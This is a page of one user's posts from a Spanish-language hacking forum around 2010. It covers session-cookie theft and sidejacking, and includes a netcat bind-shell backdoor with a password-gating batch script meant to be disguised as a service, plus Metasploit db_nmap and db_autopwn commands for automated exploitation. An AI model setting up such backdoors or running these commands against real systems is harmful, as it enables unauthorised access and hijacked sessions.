últimos mensajes de: R007h

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9

61	Seguridad Informática / Nivel Web / Re: Cookies	en: 2 Febrero 2010, 23:03 pm
Eso quiere decir que se eliminan al final de la sesion, pero ese no era el punto. De todos modos kamsky ya me lo aclaro en otro post.. Esa cookie elhackernet no es visible con document.cookie() porque tiene el atributo OnlyHttp() que da acceso a esa cookie solo por este protocolo y no por javascript xD Gracias x responder.. Salu2

62	Seguridad Informática / Hacking / Re: Sidejacking	en: 2 Febrero 2010, 19:20 pm
Gracias kamsky... Aclarado tambien el otro tema que habia publicado... Salu2

63	Seguridad Informática / Nivel Web / Cookies	en: 2 Febrero 2010, 12:05 pm
Resulta que estoy husmeando sobre esto del sidejacking y me paso esto y no c por que... bueno, resulta que primero hice una prueba, a ver si esto de robar las cookies realmente funcionaba.. entonces, lo primero que hice.. me meti en el foro, e ingrese a mi cuenta, luego en la barra de direcciones pongo javascript: prompt("",document.cookie); y efectivamente me salen las cookies de foro.elhacker.net ... las copio y las pego en un archivo de texto cualquiera. Despues voy al foro, y salgo de mi cuenta.. hasta ahora, perfecto... luego, con la ayuda de cookie edit (una extension de firefox para manipular cookies) entro a ver las diferencias entre las cookies del archivo de texto (cuando el user esta logged in) y las del navegador (cuando el user esta logged out), y me doy cuenta que hay una variable llamada elhackernet, que es la unica que cambia... entonces creo esta cookie con el cookie edit, pongo guardar y recargo la pagina del foro... Perfecto! el foro aparecia como si yo hubiera ingresado a mi cuenta!.. despues borro todas las cookies del sitio y lo intento nuevamente... entro al foro, ingreso a mi cuenta, y coloco javascript: prompt("",document.cookie); pero esta vez la cookie elhackernet ya no aparecia... entonces voy al cookie edit para ver si esta cookie existia... si existia... las preguntas de la cuestion son: por que si existe una cookie al hacer javascript: prompt("",document.cookie); no me la muestra como la primera vez?? (todo esto lo hice en firefox, lo intente en GChrome y la cookie elhackernet no salio ni la primera vez) Tienen los navegadores algun sistema de seguridad para las cookies criticas que guardan la sesion?? por qué la primera vez se mostró la cookie elhackernet y despues de haberla "falsificado" ya no se muestra al hacer document.cookie de javascript?? Se hizo un poquito largo pero espero que me hallan entendido, y que puedan aclarar mis dudas... Grax Salu2

64	Seguridad Informática / Hacking / Sidejacking	en: 2 Febrero 2010, 10:53 am
Pregunta: Cuando uno sniffea una red... aunque una conexion sea https las cookies viajan sin cifrar? es decir, yo puedo sniffar el trafico para guardarme todas las cookies y asi entrar a una cuenta de Gmail por ejemplo?? utilizando las cookies sniffadas... Grax Salu2

65	Seguridad Informática / Hacking / Re: [Metasploit] Karmetasploit	en: 13 Enero 2010, 03:32 am
hey, shell root, cual es la lisencia de tus tutoriales "[metasploit]" se pueden copiar?? obviamente siempre poniendo el sitio y el autor...

66	Seguridad Informática / Hacking / Re: Problema para conseguir remote shell	en: 10 Enero 2010, 04:31 am
Primero, que brinde muchos servicios no quiere decir que sea muuy vulnerable...(cuando hay un buen admin xD) Estudiate alguna otra vulnerabilidad, esa no es la unica que existe xD Salu2

67	Seguridad Informática / Hacking / Re: Login en backdoor con Netcat	en: 7 Enero 2010, 08:51 am
sii, estas pabadas con nc alguna vez siempre nos terminan salvand0 cuando estam0s un poco acorralados en el medio de un pentest xD jajja @Dr.Make Para que algo se "autoejecute" sin consentimiento del usuario ~~victima~~, debes aprovechar alguna falla de seguridad xD es muy diferente en cada situación. Lo que describes es algo parecido a lo que hace psexec solo que con este necesitas user/pass... Busca en el foro, seguro hay algo.. Salu2

68	Seguridad Informática / Hacking / Login en backdoor con Netcat	en: 6 Enero 2010, 09:28 am
Supongamos que tenemos una backdoor con netcat a la escucha en algun puerto de alguna computadora en algun lugar... y no queremos que cualquiera de casualidad se conecte a ese puerto y como por arte de magia le caiga del cielo una shell xD es por eso que le vamos a poner una peticion de contraseña antes de que nc nos brinde la shell.. hacemos un... Código: nc -d -L -e login.bat -p 777 y en el login.bat Código: @echo off echo Esta es una backdoor privada xD echo Password: echo. set /p pass= if %pass%==password (cmd) else (exit) Obviamente no vais a ser tan obvios de decir "hey eso es una backdoor jajaj" pero puedes simular ser un servicio, o hacer un pequeño server con batch o con wscript o con cualquiera que se te ocurra (nombro batch y wscript porque son los que hay en casi todos los PC) puedes usar la funcion GetPassword de wscript en vez del .bat... La idea era hacernos recordar que el flag -e del nc no solo cirve para ponerle cmd.exe o /bin/bash xD En fin, esto es algo extremadamente simple (a veces las cosas simples son lo mas apropiado), pero el limite de netcat esta en el limite de tu imaginación xD Salu2

69	Seguridad Informática / Hacking / Re: Squipy	en: 4 Enero 2010, 10:10 am
Suena muy bien, lo probare... Salu2

Seguridad Informática / Hacking / Re: [Nmap & Metasploit] Pasar Resultado de escaneo de Nmap al MSF

en: 3 Enero 2010, 22:33 pm

También se puede hacer asi...

Código:

msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /home/toko/.msf3/sqlite3.db
msf > db_connect
[*] Successfully connected to the database
[*] File: /home/toko/.msf3/sqlite3.db
msf > db_nmap -p 445 -sS 10.12.1-2.0-255

con esto guarda los resultad0s en la base de datos, y despues podemos usarlos con el comando db_autopwn...

Código:

msf > db_autopwn -p -e –b

Salu2

Páginas: 1 2 3 4 5 6 [7] 8 9